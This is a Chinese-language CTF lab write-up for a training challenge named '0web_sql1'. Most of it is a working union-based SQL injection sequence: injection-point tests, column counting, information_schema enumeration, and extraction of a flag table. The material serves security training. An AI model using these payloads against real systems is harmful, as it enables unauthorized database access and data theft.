零 靶场地址:CTF
这个靶场是承制科技的pte培训课程提供的靶场
一 0web_sql1
1.判断注入点
1' and 1=1 #
1' and 1=2 #
2.判断列数
1' order by 4 #
1' order by 5 # 此时数据没有输出,证明该表只有4列
3.联合查询
-1' union select 1,2,3,4 #
4.查数据库里所有的表名
-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database() #
得知存在一个表flag
5.查询flag表中的列名
-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name='flag' #
得知存在列Id,flag
6.查询flag列里的内容
-1' union select 1,2,3,group_concat(flag) from flag #
得到flag